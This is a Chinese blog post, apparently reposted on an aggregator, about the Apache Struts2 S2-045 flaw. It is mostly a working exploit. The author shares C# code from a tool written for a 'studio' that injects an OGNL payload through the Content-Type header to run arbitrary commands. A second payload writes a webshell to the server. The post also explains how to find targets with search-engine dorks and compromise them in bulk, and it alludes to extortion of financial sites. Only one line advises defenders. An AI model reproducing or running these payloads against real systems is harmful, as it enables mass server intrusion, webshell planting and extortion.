Strtus2 S2-045漏洞
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Strtus2 S2-045漏洞相关的知识,希望对你有一定的参考价值。
S2-045漏洞已经爆发几天了,但还很多网址都存在此漏洞,很多金融类网站也收到了保护费通知、、、唉,收保护费少,报警无效!只能酌情处理了!做黑产的,还是少做为秒,常在河边站哪有不湿鞋,劝各位早日金盆洗手!
至于漏洞原理我就不多讲了!为啥??? 因为我也没研究,我也不懂!!!
有工作室找我写了一个批量shell的工具,我只是简单的放出一部分代码。使用的C#
public static string ExecuteStruts2(string url,string cookie,string cmd) { ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3; HttpWebRequest request = null; try { request = (HttpWebRequest)WebRequest.Create(url); request.Method = "GET"; request.AllowAutoRedirect = false; if (!string.IsNullOrEmpty(cookie)) { request.Headers.Add("Cookie",cookie); } request.ContentType = "%{(#nike=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘"+cmd+"‘).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"; request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/56.0.2924.87 Safari/537.36"; request.Timeout = 50000; request.ServicePoint.ConnectionLimit = 500; HttpWebResponse response = (HttpWebResponse)request.GetResponse(); string result = ""; string encoding = "gb2312"; if (!string.IsNullOrEmpty(response.CharacterSet)) { encoding = response.CharacterSet; } Stream myResponseStream = response.GetResponseStream(); StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding(encoding)); result = myStreamReader.ReadToEnd(); myStreamReader.Close(); myResponseStream.Close(); response.Close(); request.Abort(); return result; } catch(Exception ex) { request.Abort(); return "执行错误:"+ex.Message; } }
这个是执行命令的,比如创建用户,提权,然后可以远程或者传马
还可以上传webshell,只要把ContentType修改成:
%{(#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#luan=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest‘).getSession().getServletContext().getRealPath(‘"+path+ "‘)).(#shell=‘我是shell‘).(new java.io.BufferedWriter(new java.io.FileWriter(#path+‘/shell文件名‘).append(#shell)).close()).(#cmd=‘echo path:‘+#path).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
还有其他玩法可以自行修改。然后就是inurl:****.action,然后爬搜索引擎,抓url,批量检测,批量上传shell。
有用struts2的赶紧看看最近几天有没有生成的jsp,jspx等的新文件吧,至于修复,网上很多办法,还有第三方工具等
以上是关于Strtus2 S2-045漏洞的主要内容,如果未能解决你的问题,请参考以下文章
漏洞预警 | Apache Struts2 曝任意代码执行漏洞 (S2-045)
更新Struts2爆远程代码执行漏洞(S2-045),附POC